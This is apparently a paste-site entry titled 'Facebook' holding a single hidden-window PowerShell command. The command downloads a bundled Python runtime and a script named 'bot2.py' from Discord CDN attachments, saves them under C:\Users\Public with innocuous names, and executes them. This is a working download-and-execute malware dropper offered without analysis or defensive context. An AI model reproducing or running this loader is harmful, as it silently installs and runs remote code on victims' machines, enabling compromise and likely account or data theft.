Facebook
From bc, 9 Months ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 263
  1. powershell -WindowStyle Hidden -Command "Invoke-WebRequest -URI 'https://cdn.discordapp.com/attachments/705292567247454213/1205530921013481482/python.zip?ex=65d8b529&is=65c64029&hm=1042cf09bd3d2028bcfb76eda6521ef9310fe1bb4926a752628f363471ac7906' -OutFile 'C:\Users\Public\document.zip'; Expand-Archive C:\Users\Public\document.zip -DestinationPath C:\Users\Public\document; Invoke-WebRequest -URI 'https://cdn.discordapp.com/attachments/705292567247454213/1206073520572858398/bot2.py?ex=65daae7f&is=65c8397f&hm=2fbe675304aba8ef5699f86f17bc6d94efc8b3e4eb2dced5e821f1732fef9d5d&' -OutFile C:\Users\Public\document\libb1.py; C:\Users\Public\document\python C:\Users\Public\document\libb1.py;  C:\Users\Public\document\python C:\Users\Public\document\phu.py";